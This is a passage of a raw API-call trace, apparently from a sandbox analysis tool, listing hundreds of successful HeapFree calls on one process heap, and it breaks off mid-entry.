[0283.724] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2103290 | out: hHeap=0x5d0000) returned 1 [0283.729] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21164a0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21296b0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x213c8c0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x214fad0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2162ce0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2175ef0 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2189100 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x219c310 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21af520 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21c2730 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21d5940 | out: hHeap=0x5d0000) returned 1 [0283.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21e8b50 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x21fbd60 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x220ef70 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2222180 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2235390 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22485a0 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x225b7b0 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x226e9c0 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2281bd0 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2294de0 | out: hHeap=0x5d0000) returned 1 [0283.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22a7ff0 | out: hHeap=0x5d0000) returned 1 [0283.738] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22bb200 | out: hHeap=0x5d0000) returned 1 [0283.865] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22ce410 | out: hHeap=0x5d0000) returned 1 [0283.865] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22e1620 | out: hHeap=0x5d0000) returned 1 [0283.865] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x22f4830 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2307a40 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x231ac50 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x232de60 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2341070 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2354280 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2367490 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x237a6a0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x238d8b0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x23a0ac0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x23b3cd0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x23c6ee0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x23da0f0 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x23ed300 | out: hHeap=0x5d0000) returned 1 [0283.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2400510 | out: hHeap=0x5d0000) returned 1 [0283.872] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2413720 | out: hHeap=0x5d0000) returned 1 [0283.873] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2426930 | out: hHeap=0x5d0000) returned 1 [0283.873] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2439b40 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x244cd50 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x245ff60 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2473170 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2486380 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2499590 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x24ac7a0 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x24bf9b0 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x24d2bc0 | out: hHeap=0x5d0000) returned 1 [0283.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x24f0080 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2503290 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25164a0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25296b0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x253c8c0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x254fad0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2562ce0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2575ef0 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2589100 | out: hHeap=0x5d0000) returned 1 [0283.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x259c310 | out: hHeap=0x5d0000) returned 1 [0283.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25af520 | out: hHeap=0x5d0000) returned 1 [0283.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25c2730 | out: hHeap=0x5d0000) returned 1 [0283.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25d5940 | out: hHeap=0x5d0000) returned 1 [0283.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25e8b50 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x25fbd60 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x260ef70 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2622180 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2635390 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26485a0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x265b7b0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x266e9c0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2681bd0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2694de0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26a7ff0 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26bb200 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26ce410 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26e1620 | out: hHeap=0x5d0000) returned 1 [0283.886] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x26f4830 | out: hHeap=0x5d0000) returned 1 [0283.891] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2707a40 | out: hHeap=0x5d0000) returned 1 [0283.891] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x271ac50 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x272de60 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2741070 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2754280 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2767490 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x277a6a0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x278d8b0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x27a0ac0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x27b3cd0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x27c6ee0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x27da0f0 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x27ed300 | out: hHeap=0x5d0000) returned 1 [0283.892] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2800510 | out: hHeap=0x5d0000) returned 1 [0283.896] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2813720 | out: hHeap=0x5d0000) returned 1 [0283.896] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2826930 | out: hHeap=0x5d0000) returned 1 [0283.896] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2839b40 | out: hHeap=0x5d0000) returned 1 [0283.896] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x284cd50 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x285ff60 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2873170 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2886380 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2899590 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x28ac7a0 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x28bf9b0 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x28d2bc0 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x28e5dd0 | out: hHeap=0x5d0000) returned 1 [0283.898] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x28f8fe0 | out: hHeap=0x5d0000) returned 1 [0283.899] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x290c1f0 | out: hHeap=0x5d0000) returned 1 [0286.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x291f400 | out: hHeap=0x5d0000) returned 1 [0286.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2932610 | out: hHeap=0x5d0000) returned 1 [0286.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2945820 | out: hHeap=0x5d0000) returned 1 [0286.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2958a30 | out: hHeap=0x5d0000) returned 1 [0286.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x296bc40 | out: hHeap=0x5d0000) returned 1 [0286.548] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x297ee50 | out: hHeap=0x5d0000) returned 1 [0286.549] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2992060 | out: hHeap=0x5d0000) returned 1 [0286.549] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29a5270 | out: hHeap=0x5d0000) returned 1 [0286.549] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29b8480 | out: hHeap=0x5d0000) returned 1 [0286.550] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29cb690 | out: hHeap=0x5d0000) returned 1 [0286.550] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29de8a0 | out: hHeap=0x5d0000) returned 1 [0286.550] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29f1ab0 | out: hHeap=0x5d0000) returned 1 [0286.550] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a04cc0 | out: hHeap=0x5d0000) returned 1 [0286.550] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a17ed0 | out: hHeap=0x5d0000) returned 1 [0286.554] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a2b0e0 | out: hHeap=0x5d0000) returned 1 [0286.554] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a3e2f0 | out: hHeap=0x5d0000) returned 1 [0286.555] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a51500 | out: hHeap=0x5d0000) returned 1 [0286.555] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a64710 | out: hHeap=0x5d0000) returned 1 [0286.555] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a77920 | out: hHeap=0x5d0000) returned 1 [0286.555] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a8ab30 | out: hHeap=0x5d0000) returned 1 [0286.557] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a9dd40 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ab0f50 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ac4160 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ad7370 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2aea580 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2afd790 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b109a0 | out: hHeap=0x5d0000) returned 1 [0286.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b23bb0 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b36dc0 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b49fd0 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b5d1e0 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b703f0 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b83600 | out: hHeap=0x5d0000) returned 1 [0286.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b96810 | out: hHeap=0x5d0000) returned 1 [0286.567] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ba9a20 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2bbcc30 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2bcfe40 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2be3050 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2bf6260 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c09470 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c1c680 | out: hHeap=0x5d0000) returned 1 [0286.568] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c2f890 | out: hHeap=0x5d0000) returned 1 [0286.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c42aa0 | out: hHeap=0x5d0000) returned 1 [0286.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c55cb0 | out: hHeap=0x5d0000) returned 1 [0286.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c68ec0 | out: hHeap=0x5d0000) returned 1 [0286.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c7c0d0 | out: hHeap=0x5d0000) returned 1 [0286.573] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c8f2e0 | out: hHeap=0x5d0000) returned 1 [0286.575] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ca24f0 | out: hHeap=0x5d0000) returned 1 [0286.576] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2cb5700 | out: hHeap=0x5d0000) returned 1 [0286.576] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2cc8910 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2cf0080 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d03290 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d164a0 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d296b0 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d3c8c0 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d4fad0 | out: hHeap=0x5d0000) returned 1 [0286.577] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d62ce0 | out: hHeap=0x5d0000) returned 1 [0286.672] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d75ef0 | out: hHeap=0x5d0000) returned 1 [0286.672] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d89100 | out: hHeap=0x5d0000) returned 1 [0286.678] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2d9c310 | out: hHeap=0x5d0000) returned 1 [0286.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2daf520 | out: hHeap=0x5d0000) returned 1 [0286.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2dc2730 | out: hHeap=0x5d0000) returned 1 [0286.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2dd5940 | out: hHeap=0x5d0000) returned 1 [0286.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2de8b50 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2dfbd60 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e0ef70 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e22180 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e35390 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e485a0 | out: hHeap=0x5d0000) returned 1 [0286.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e5b7b0 | out: hHeap=0x5d0000) returned 1 [0286.686] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e6e9c0 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e81bd0 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2e94de0 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ea7ff0 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ebb200 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ece410 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ee1620 | out: hHeap=0x5d0000) returned 1 [0286.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ef4830 | out: hHeap=0x5d0000) returned 1 [0286.692] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f07a40 | out: hHeap=0x5d0000) returned 1 [0286.692] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f1ac50 | out: hHeap=0x5d0000) returned 1 [0286.693] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f2de60 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f41070 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f54280 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f67490 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f7a6a0 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2f8d8b0 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2fa0ac0 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2fc6ee0 | out: hHeap=0x5d0000) returned 1 [0286.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2fda0f0 | out: hHeap=0x5d0000) returned 1 [0286.698] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2fed300 | out: hHeap=0x5d0000) returned 1 [0286.701] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3000510 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3013720 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3026930 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3039b40 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x304cd50 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x305ff60 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3073170 | out: hHeap=0x5d0000) returned 1 [0286.704] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3086380 | out: hHeap=0x5d0000) returned 1 [0286.802] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3099590 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x30ac7a0 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x30bf9b0 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x30d2bc0 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x30e5dd0 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x30f8fe0 | out: hHeap=0x5d0000) returned 1 [0286.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x310c1f0 | out: hHeap=0x5d0000) returned 1 [0286.808] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x311f400 | out: hHeap=0x5d0000) returned 1 [0286.808] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3132610 | out: hHeap=0x5d0000) returned 1 [0286.809] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3145820 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3158a30 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, 